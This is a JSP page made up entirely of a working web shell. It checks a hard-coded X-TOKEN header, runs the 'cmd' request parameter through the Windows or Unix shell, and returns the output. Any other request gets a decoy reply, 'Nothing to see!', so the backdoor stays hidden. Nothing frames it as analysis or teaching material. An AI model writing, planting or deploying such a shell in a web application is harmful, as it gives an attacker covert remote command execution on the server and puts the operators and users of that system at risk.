<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
xmlns:c="http://java.sun.com/jsp/jstl/core"
xmlns:fn="http://java.sun.com/jsp/jstl/functions"
xmlns:fmt="http://java.sun.com/jsp/jstl/fmt"
xmlns:t="/WEB-INF/tags"
xmlns="http://www.w3.org/1999/xhtml"
version="2.0">
<jsp:directive.page import="java.util.*,java.io.*" />
<jsp:scriptlet>
if (request.getHeader("X-TOKEN") !=null){
	if (request.getHeader("X-TOKEN").equals("9ebc314e6dacf0a6ab1c08c444b3deb50338b188a70cad862a6482d1ae0e5be2")){
		String cmd;
		String[] cmdarr;
		String OS = System.getProperty("os.name");
		if (request.getParameter("cmd") != null) {
		cmd = new String (request.getParameter("cmd"));
		if (OS.startsWith("Windows")) {
		cmdarr = new String [] {"cmd", "/C", cmd};
			}
		else {
		cmdarr = new String [] {"/bin/sh", "-c", cmd};
			}
		Process p = Runtime.getRuntime().exec(cmdarr);
		OutputStream os = p.getOutputStream();
		InputStream in = p.getInputStream();
		DataInputStream dis = new DataInputStream(in);
		String disr = dis.readLine();
		while ( disr != null ) {
			out.println(disr);
		disr = dis.readLine();
					}
		}	
	} else {
		out.print("Nothing to see!");
		}
}
else {
out.print("Nothing to see!");
}
</jsp:scriptlet>
</jsp:root>
